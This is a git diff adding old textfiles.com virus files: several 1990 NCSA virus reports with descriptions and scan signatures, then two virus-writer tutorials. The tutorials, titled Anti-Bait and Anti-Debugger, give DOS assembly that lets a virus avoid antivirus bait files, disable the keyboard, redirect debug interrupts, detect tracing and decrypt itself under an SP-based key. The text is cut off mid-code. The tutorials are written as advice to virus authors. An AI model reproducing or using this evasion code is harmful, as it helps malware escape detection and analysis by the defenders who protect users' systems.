b/textfiles.com/virus/NCSA/ncsa135.txt new file mode 100644 index 00000000..80ae3d32 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa135.txt @@ -0,0 +1,57 @@ + Ŀ + VIRUS REPORT + Vcomm Virus + + +Synonyms: 637 + +Date of Origin: December, 1989. + +Place of Origin: Poland. + +Host Machine: PC compatibles. + +Host Files: Memory resident. Infects EXE files. + +Increase in Size of Infected Files: 637 bytes. + +Nature of Damage: Corrupts program files. + +Detected by: F-Prot, Scanv60+, IBM Scan, Pro-Scan. + +Removed by: F-Prot, Scan/D, or delete infected files. + + When an infected file is run, Vcomm attempts to infect one EXE file +in the current directory. During infection, Vcomm first pads the file so +that the file's length to a multiple of 512 bytes, then it adds its 637 +bytes of virus code to the end of the file. + + The memory resident portion of the virus intercepts any disk writes +that are attempted, and changes them into disk reads. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa136.txt b/textfiles.com/virus/NCSA/ncsa136.txt new file mode 100644 index 00000000..ec4b17fd --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa136.txt @@ -0,0 +1,78 @@ + Ŀ + VIRUS REPORT + Vienna + + +Synonyms: Austrian, One in Eight, DOS-62, DOS-68, 648, UNESCO virus. + +Date of Origin: December, 1987. + +Place of Origin: Vienna, Austria. + +Host Machine: PC compatibles. + +Host Files: COMMAND.COM, COM files. + +Increase in Size of Infected Files: 648 bytes. + +Nature of Damage: Corrupts program or overlay files. + +Detected by: Scanv56+, F-Prot. + +Removed by: M-VIENNA, CleanUp, VirClean, F-Prot.. + +Scan Code: You can search at offset 005H for 8B F2 83 C6 0A 90 BF 00 01 +B9. + +History: The virus was first detected in Vienna in December, 1987. In +April, 1988, this virus surfaced in Moscow at a children's summer +computer camp run by UNESCO. Someone who didn't know of its prior +existence in Austria gave it the name DOS-62, presumably because its +method of indicating an already infected file is to set the seconds field +of the time entry of the file to 62. + +Description of Operation: This virus is a memory resident virus. It +infects COM files (including COMMAND.COM) as they are loaded and +executed. The infected files increase in size by approximately 648 +bytes. Some infected programs will not run. + + The first three bytes of the program are stored in the virus, and +replaced by a branch to the beginning of the virus. The virus looks for, +and infects, one COM file - either in the current directory or in one of +the directories on the PATH. + + One in eight files infected does not get a copy of the virus. +Instead the first five bytes of the program are replaced by a far jump to +the BIOS initialization routine. That is, in one out of eight attempted +infections, the system will perform a warm reboot when the infected +program is run. + +Removal: To remove the virus, follow the instructions provided for the +Jerusalem virus or run M-VIENNA. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa137.txt b/textfiles.com/virus/NCSA/ncsa137.txt new file mode 100644 index 00000000..b00c18f8 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa137.txt @@ -0,0 +1,56 @@ + Ŀ + VIRUS REPORT + Vienna-B + + +Synonyms: 62-B + +Host Machine: PC compatibles. + +Host Files: COM files. + +Increase in Size of Infected Files: 648 bytes. + +Nature of Damage: Corrupts COM files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, M-Vienna, VirClean, F-Prot. + +Derived from: Vienna. + +Scan Code: You can search at offset 005H for 8B F2 81 C6 0A 00 BF 00 01 +B9. + +Description of Operation: This virus is similar to Vienna/DOS-62 except +the re-boot is replaced by deleting the executed program. In another +variation of this virus, an error has been introduced which disables the +virus's ability to search through the PATH, and the far jump has been +replaced by five spaces. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa138.txt b/textfiles.com/virus/NCSA/ncsa138.txt new file mode 100644 index 00000000..534d1db6 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa138.txt @@ -0,0 +1,52 @@ + Ŀ + VIRUS REPORT + Virus-90 + + +Date of Origin: December, 1989. + +Place of Origin: Washington, DC + +Host Machine: PC compatibles. + +Host Files: Remains resident; infects COM files. + +Increase in Size of Infected Files: 857 bytes. + +Nature of Damage: Corrupts program files. + +Detected by: Scanv53+, F-Prot, IBM Scan. + +Removed by: CleanUp, Scan/D, F-Prot, or delete the infected files. + + Virus-90 virus was written by Patrick Toulme and sold for a time as +an "educational tool". In January, 1990, Toulme contacted the sites +where he had uploaded the virus and asked that they remove it from their +systems. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa139.txt b/textfiles.com/virus/NCSA/ncsa139.txt new file mode 100644 index 00000000..5a07b5f0 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa139.txt @@ -0,0 +1,57 @@ + Ŀ + VIRUS REPORT + Virus101 + + +Date of Origin: January, 1990. + +Place of Origin: Washington, DC + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects all executable files and boot +sector on a floppy. + +Increase in Size of Infected Files: 2,560 bytes. + +Nature of Damage: Corrupts program files, boot sector. + +Detected by: Scanv57+. + +Removed by: Scan/D or delete the infected files. + +Derived from: Virus90. + + Virus101 is the descendent of Virus-90, also written by Patrick +Toulme as an "educational tool". The virus employs an encryption scheme +to avoid detection. It infects COMMAND.COM and all other executable file +types (COM, EXE, overlay). Once it has infected all the files on a +diskette, it will infect the diskette's boot sector. The current version +only infects floppy disks. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa140.txt b/textfiles.com/virus/NCSA/ncsa140.txt new file mode 100644 index 00000000..4a21d07f --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa140.txt @@ -0,0 +1,51 @@ + Ŀ + VIRUS REPORT + W13 + + +Date of Origin: December, 1989. + +Place of Origin: Poland. + +Host Machine: PC compatibles. + +Host Files: Non-resident. Infects COM files. + +Increase in Size of Infected Files: 507 or 534 bytes. + +Nature of Damage: Corrupts program files. + +Detected by: F-Prot, IBM Scan. + +Removed by: F-Prot or delete the infected files. + + W13 doesn't do much except infect files. One variety is 534 bytes in +length, and the second is 507 bytes long. The 507 byte variety is derived +from the 534 variety, correcting some bugs in 534. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa141.txt b/textfiles.com/virus/NCSA/ncsa141.txt new file mode 100644 index 00000000..631f16b1 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa141.txt @@ -0,0 +1,43 @@ + Ŀ + VIRUS REPORT + WDEF + + +Date of Origin: December, 1989? + +Host Machine: Macintosh. + +Host Files: floppy and hard disk files. + +Detected by: Gatekeeper Aid 1.0.1, Anti-Virus Kit, Disinfectant 1.5 + +Removed by: Gatekeeper Aid 1.0.1, Anti-Virus Kit, Disinfectant 1.5 + + Virus Detective 3.0.1 does not seem effective with this. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa142.txt b/textfiles.com/virus/NCSA/ncsa142.txt new file mode 100644 index 00000000..98662e19 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa142.txt @@ -0,0 +1,51 @@ + Ŀ + VIRUS REPORT + XENO + + +Synonyms: 2608 virus + +Date of Origin: October, 1989 + +Place of Origin: Vancouver, BC, Canada + +Host Machine: Amiga. + +Host Files: non-boot sector virus. + +Description of Operation: Works like the IRQ virus, attaching itself to +the first executable in the startup-sequence. However, it copies the +found executable to devs:" " and copies itself into the old name in the +"C" directory (size 2608 bytes). Whenever the command is executed it +calls the virus which in turn would call the REAL command, thus giving +the appearance that all is well. + + On about every fifth warm boot, the virus displays a message briefly, +containing the words "Virus Exterminator..." + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa143.txt b/textfiles.com/virus/NCSA/ncsa143.txt new file mode 100644 index 00000000..bfd615be --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa143.txt @@ -0,0 +1,88 @@ + Ŀ + VIRUS REPORT + Yankee Doodle + + +Date of Origin: September 30, 1989. + +Place of Origin: Sofia, Bulgaria. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM, EXE files. + +OnScreen Symptoms: Plays "Yankee Doodle" on the system speaker some time +after loading. + +Increase in Size of Infected Files: 2885 or 2899 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts COM and +EXE files. + +Detected by: Scanv42+, F-Prot. + +Removed by: CleanUp, Scan/D, VirClean, F-Prot, or delete infected files. + + This virus was written by Wladimir Bochev from Sofia, Bulgaria, as an +intellectual exercise. It was discovered in Vienna by Alexander Holy at +the United Nation's North Atlantic Project office on Sept 30th, 1989. +The virus has reportedly been transmitted to the U.S. through U.N. +employees via the game "Outrun". + + The virus plays the tune "Yankee Doodle Dandy" on the system's +speaker either when the program is loaded, or 17 hours after an infected +program is loaded, depending on the version of Yankee Doodle. Both COM +and EXE files of any size can be infected, and the virus willingly +infects every such file. + + Infected files grow in size by 2899 bytes. Infected files can be +recognized by the string "motherfucker" at their ends. In the early +versions, there was no damage caused by the virus. In fact, the virus was +apparently designed as a virus fighter. It will seek out and modify Ping +Pong viruses, changing them so that they self-destruct after 100 +infections. Subsequent strains may format the hard disk. Several +variations on the Yankee Doodle virus have been identified. See entries +for: + +* TP25VIR + +* TP33VIR + +* TP34VIR + +* TP38VIR + +* TP42VIR + +* TP44VIR + +* TP46VIR + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa144.txt b/textfiles.com/virus/NCSA/ncsa144.txt new file mode 100644 index 00000000..914e4874 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa144.txt @@ -0,0 +1,42 @@ + Ŀ + VIRUS REPORT + Yankee Doodle-2 Virus + + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects EXE files only. + +OnScreen Symptoms: Plays "Yankee Doodle" on the system speaker as soon +as an infected program is executed. + +Nature of Damage: Affects system run-time operation. Corrupts EXE files. + +Detected by: Scanv62+. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/abaittut.txt b/textfiles.com/virus/abaittut.txt new file mode 100644 index 00000000..0987de28 --- /dev/null +++ b/textfiles.com/virus/abaittut.txt @@ -0,0 +1,356 @@ + Anti-Bait Technique + ~~~~~~~~~~~~~~~~~~~ + + -HATE-YOUR-ENEMIES- + + By using the methods explained in the previous section, we can +safely say that the AV can not simply set the bait maker to generate +10,000 bait files, with the virus in memory, and get an accurate and +complete of what is necessary. Instead they must use many varying files, +reboot the system thousands of times to change the date, and fiddle with +the generation counter, which will significantly slow things down. But +let us take things a step further: let us imagine that the virus won't +even infect the files in the first place. This would simply involve +putting the candidate file through a number of tests, and if it fails +any of them, saying the file could be a bait, and not infecting them. +This section simply looks at what some of these test could entail. + + + Anti-Bait Techniques: The Obvious + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + The are two very obvious and easy test your virus _SHOULD_ have: + + 1. It should not infect new files. + 2. It should not infect small files. + + New files should not be infected, as the files created by a bait +maker will usually look new. Simply grab the current date, and compare +it to the date stamp of the file. It is the same? Well then dont infect! +It should be noted that this is easilly defeated, if the bait maker sets +the files date stamp to a random date, before closing it. + + The files created by bait makers, will usually be fairly small, +so small files should be avoided. I would recommend that you avoid files +smaller then between 5,000 and 10,000 bytes. The smaller you make this +limit, the less chance there is that a legitimate file will be wrongly +be left uninfected, but it is also more likely that a bad bait file will +wrongly be infected. By making the limit larger, the greater the chance +there is that a legitimate file will be wrongly be left uninfected, but +its also more likely that a bait file will correctly be left uninfected. +High limit or Low limit? The choice is yours... This could easilly be +defeated if the bait maker created files which were, say, 50,000 bytes. +This size is obviously far to large to avoid, as it is larger then many +legitimate programs. You should also remember however that 10,240 files +at 5,000 bytes will use 52 megabytes, so if the bait files were 50,000 +bytes long, this figure would go upto 520 megabytes! Most test computers +do not have such lard hard drives, so it is safe to assume that the bait +files will be small. + + As the above two methods are so easy to implement, I will not +bother to supply any example code. + + + Anti-Bait Techniques: Avoid Digital File Names + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + Most bait makers create filenames like '00000000.com' followed +by '00000001.com'. All the file are names composed of the characters '0' +to '9'. We could have a check in our virus, to ensure that this is not +true, and if it is, not infect the file, as shown below: +------------------------------------------------------------------------ + +;This code avoids file names composed entirely of digits. It is assumed +;that the file has already been opened, and that its file handle is in +;BX. get_sft_bx is assumed to be a sub-procedure that returns ES:DI pointing +;to the SFT entry of the handle in BX (the file to be infected). + + call get_sft_bx + mov si,di + add si,20 ;File names in at offset 20h of SFT + mov cx,8 ;8 characters in name (padded with spaces) + cld ;increment SI on LODSB + +check_name: + es:lodsb + cmp al,'0' + jb name_safe + cmp al,'9' + ja name_safe ;character is not digit, so it is safe + + cmp al,20 ;check for space if equal, end of name has + je not_safe ;been reached, with only digits encounters. + ;which means it is possibly bait. + + loop check_name ;check next character + +not_safe: + jmp exit_infect ;end of name reached with only digits so + ;do not infect + +name_safe: + +------------------------------------------------------------------------ + + This method could easilly be defeated by using file names like +'AAAAAAAA.COM' instead of '00000000.com'. + + + + Anti-Bait Techniques: Avoid Consecutive File Names + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + Many people consider this method overkill, but it is extremely +effective, if you are serious about your Post-Discovery-Stratagies. It +works by checking if the currents file to be infected, has a consecutive +file name of the previous filename. For example, if the previous file to +be infected was called 'AAAAAAAA.COM' you would not infect the next file +if it was called 'AAAAAAAB.COM'. The easiest way to do this, is save the +sum of the characters of the file name. If the next file is consecutive +to it, the sum will be the sum of the previous one + 1. i.e: + + 'AAAAAAAA' = 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + = 208h + + 'AAAAAAAB' = 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'B' + = 209h + + Therefore, of the filename of your candidate file, and use it to +check if the next file to be infected is consecutive. If it is do not +infect! Example: +------------------------------------------------------------------------ + +;This code avoids infecting files with consecutive filenames. It is assumed +;that the file has already been opened, and that its file handle is in +;BX. get_sft_bx is assumed to be a sub-procedure that returns ES:DI pointing +;to the SFT entry of the handle in BX (the file to be infected). + + call get_sft_bx + mov si,di + add si,20 ;File names in at offset 20h of SFT + mov cx,8 ;8 characters in name (padded with spaces) + cld ;increment SI on LODSB + xor bx,bx + mov ah,0 + +check_consecutive: + es:lodsb + cmp al,20 ;check for space + je end_cc ;if space, end of name rached + add bx,ax ;add character to sum + loop check_consecutive + +end_cc: mov ax,cs:last_sum ;the sum of the last filename + mov cs:last_sum,bx ;save the sum of this file name for next time + inc ax + cmp ax,bx + je dont_infect + + +------------------------------------------------------------------------ + + The above code is fairly lengthy, and messy, but it works! You +should also not infect a file, if it is the same length as the previous +file, for obvious reasons. This code could by defeated by incrementing +filename by values other then 1, or even by incrementing it by a RANDOM +amount each time. + + To help you test your Anti-Bait code, I have put together a Bait +Generator (Sepultura's Funky Bait Maker), which can be modified to show +how each of the above methods are defeated. Here is the complete source: +------------------------------------------------------------------------ + +;SFBM.ASM compile with A86 +;This is a bait maker that in its original state, will fail to defeat all +;of the above mentioned techniques. However, by making the modifications +;described through out the code, all of the above techniques will fail +;miserably. + +;By changing the Below EQUates, and (un)commenting certain code below, you +;can test the various technique described above, as well as any other Anti- +;Bait Technique you think off.. + +number_of_files equ 200 ;number of bait files to genrate + +file_length equ 5000 ;length of bait file. Change this to + ;catchout virii that do not infect + ;small files. (minimum 38, maximum + ;65,279). + +first_character equ '0' ;Changing these two equates to 'A' to +last_character equ '9' ;'Z' will fool virii that check if + ;the filename is entirely numbers.. + + +character_range equ (last_character - first_character)+1 ;This is used + ;to calculate the + ;filename.. + + radix 16 + + org 100 + + mov ds,cs + mov ah,9 + mov dx,offset gen_msg ;prints intro message.. + int 21 + + mov cx,number_of_files ;200 bait files + +file_loop: + push cx + mov dx,offset filename + xor cx,cx + mov ax,3c02 ;CREATE/TRUNCATE "filename" + int 21 + mov bx,ax ;BX = Handle. I used a MOV, so + ;AH stays = to 0 + + mov dx,offset bait + mov cx,file_length ;file is 5000 bytes long + + ;Uncomment the IN, and ADD below, so the length of the bait becomes + ;between FILE_LENGTH and (FILE_LENGTH + 255). This is to catchout + ;virii that wont infect a file if its the same size as the last file. + ;in al,40 + ;add cx,ax + + mov ah,40 ;Write Bait Program to file.. + int 21 + + ;Uncommenting the below CALL, will cause SFBM to set each file + ;to a random date, before closing, avoiding virii which dont + ;infect new files. + ;call set_date + + pop cx + + mov ah,3e ;Closes the file.. + int 21 + + push ds + mov ax,4b00 ;This calls a execute of "filename" + ;i have set up no parameter tables, + ;so it will not actually execute, but + ;the virus will intercept and infect. + mov dx,offset filename + int 21 + pop ds + + mov ah,9 + mov dx,offset done ;prints: + int 21 ;DONE: XXXXXXXX.COM + + std + mov si,offset units + mov di,si + + +next_character: + mov dl,1 ;Add 1 to file name characters. + ;(00000000 -> 00000001) etc.. + + ;Uncommenting the code below, will cause SFBM to add between + ;2 and 5 to the file name characters. This will avoid virii that + ;check for consecutive file names, as they are not incrementing by + ;1 each time. + ;cmp si,offset units ;Are we modifying a character other? + ;jne not_unit ;If not, only add 1 to the character + ;in al,40 + ;and al,3 ;Choose amount between 2 and 5 to + ;add dl,al ;add.. + ;inc dx + +not_unit: + lodsb + add al,dl ;Calculate Next File Name (increment) + cmp al,last_character + 1 ;Has it overflowed past + jb no_more_increase ;last_character? If not continue.. + + sub al,character_range ;else bring it back into range, + ds:stosb + jmp short next_character ;increment next char, and check for + ;overflow... + +no_more_increase: + ds:stosb + loop file_loop ;Do Next File (CX times) + + mov ah,4c + int 21 + +set_date: ;Sub Procedure gives file random Date & Time. + in ax,40 ;calculates the Year for Date stamp + and ax,0f + xchg dx,ax + shl dx,9 + +get_month: ;calculates the Month for Date stamp + in ax,40 + and ax,0f + cmp ax,0c + ja get_month + or ax,ax + jz get_month + shl ax,5 + or dx,ax + +get_date: ;calculates the Day of Month for Date stamp + in ax,40 + and ax,1f + or ax,ax + jz get_date + or dx,ax ;DX = DATE + +get_secs: ;calculates seconds of the Time Stamp + in ax,40 + and ax,1f + cmp ax,1d + ja get_secs + xchg cx,ax + +get_minuits: ;calculates minuits of the Time Stamp + in ax,40 + and ax,3f + cmp ax,3b + ja get_minuits + shl ax,5 + or cx,ax + +get_hours: ;calculates hours of the Time Stamp + in ax,40 + and ax,1f + cmp ax,17 + ja get_hours + shl ax,0b + or cx,ax ;CX = TIME + + mov ax,5701 ;set DATE/TIME stamp + int 21 + ret + +gen_msg db "- Sepulturas Funky Bait Maker -",0a,0d + db "Generating Funky Bait Files...",0a,0d,"$" + +done db "DONE: " +filename db 7 dup (first_character) +units db first_character + db ".COM" + db 0,0d + db "$" + +;This is the .COM program that will be at the start of each Bait file. +;It is 38 bytes long. The rest of the file will just be padded with +;garbage from memory. + +bait: call bait_b + db 'Sepulturas Funky Bait File!$' +bait_b: pop dx ;DX = offset of bait message + mov ah,9 + int 21 ;print message + int 20 ;exit + +;END SFBM.ASM +------------------------------------------------------------------------ + + The above Bait Maker can be very useful, to test your Anti-Bait +techniques. It is also quite useful, for its orginal purpose - analysing +virii. Use it for either - AV - VX - they're all the same to me. + diff --git a/textfiles.com/virus/adebgtut.txt b/textfiles.com/virus/adebgtut.txt new file mode 100644 index 00000000..8551c60d --- /dev/null +++ b/textfiles.com/virus/adebgtut.txt @@ -0,0 +1,362 @@ + Anti-Debugger Techniques + ~~~~~~~~~~~~~~~~~~~~~~~~ + + -THE-MASTER-HIDES-BEHIND-THE-MASK- + + + Ok, now the AV can not even get your virus to infect their bait +files, and if they do finally manage, they will have great problems in +getting a complete, accurate view of what they are dealing with. There +is two things they can do: + +1. Disassemble your Anti-Bait code, and create a Bait maker to fool it. +2. Disassemble your Polymorphic engine, and work out what to look for. + + Both of the above can be defeated by using Anti-Debugger +Techniques. The first is defeated by keeping your Anti - Bait routines +encrypted, and heavilly armoured, to prevent disassembly. The second can +be defeated by using the same methods on your polymorphic engine. This +section has been designed to tell you how to do it. + + Anti-Debugger Techniques: The Obvious + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + There are many simple and trivial ways to thwart debuggers. This +document will deal mainly with more advanced methods. The simple methods +outlined in this section can be seen in the code example of "Using Your +Anti-Debug Routines as the Decryption Key", later on in this document. + + Perhaps the most obvious way to kill a debugger, is to overwrite +the Interrupt Vector of Interrupts 1 (Debug Single Step), and 3 (Debug +Break Point). This can be defeated by simply skipping the instructions. +Another thing you could do, is place an INT 3 in a long loop, which will +cause the debugger to stop at the INT 3 each iteration, which will stop +the AV from simply proceeding through the loop. This is very easilly +defeated by NOP'ing out the INT 3. + + Another thing to do, is turn of the keyboard. There are manyways +to do this, but the simplest is: IN AL,20h ;Turn of Keyboard IRQ + OR AL,02 + OUT AL,20 + + + + IN AL,20 ;Enable Keyboard IRQ + AND AL,NOT 2 + OUT AL,20 + + Anti-Debugger Techniques: Interrupt Replacement + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + This technique involves replacing the vector of a INTERRUPT 1/3 +with the interrupt off another interrupt, and calling that instead. This +works especially well with INT 3, as it is only 1 byte long, and can not +simply be replaced with the proper Interrupt. Here is an example of INT +replacement from the virus [H8urNMEs]. It changes INT 3 to point to the +tunneled INT 21, and calls INT 3 for all DOS requests: +------------------------------------------------------------------------ + + mov ax,3503 + int 21 + + mov int_3_seg,es + mov int_3_off,bx + + lds dx, site_traced_off + mov ax,2503 + int 21 + + mov ds,cs + + mov ax,3524 + int 3 + + mov int_24_seg,es + mov int_24_off,bx +------------------------------------------------------------------------ + + It simply makes INT 3 point to DOS, and uses this fact to fetch +the INT 24 vector. + + Anti-Debugger Techniques: INT 1 Tracing Destroys the Stack + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + When tracing through code, with INT 1, the 6 bytes below SP are +overwritten with the pushed returnig IP, CS, and Flags. There are 2 ways +to take advantage of this fact. The first is to PUSH a value on to the +stack, POP it, and then adjust SP and POP it again to see if it changes. +If it has, the code has been traced. Here is an example: +------------------------------------------------------------------------ + + PUSH AX + POP AX + DEC SP + DEC SP + POP BX ;BX should point to the pushed AX. + CMP AX,BX + JNE CODE_IS_TRACED +------------------------------------------------------------------------ + + The second way is to store a critigal value like a Decryption +key in SP. This value should also point to the code, and you should NOT +use any stack operations. This way, if a debugger is running, the code +that SP points to will be overwritten. Here is a complete program to +illustrate it. To make it run properly, you must have to encrypt it. I +will not how you how.. If you can not work it out you should not even be +reading this. It also has the added advantage of avoiding the TBAV '#' +(decryptor) flag. Any way here it is: +------------------------------------------------------------------------ +;STACK.ASM + + radix 16 + +elength equ (end - estart)/2 + + org 100 + + mov bp,sp + cli + mov sp,estart + sti + + mov bx,sp + mov cx,elength + +eloop: xor cs:[bx],sp ;SP is decryption key. + inc bx + inc bx ;If a Debugger is running, + cli ;All the code after ESTART will be + add sp,6 ;overwritten. + sti + loop eloop + +estart: + cli + mov sp,bp + sti + + mov 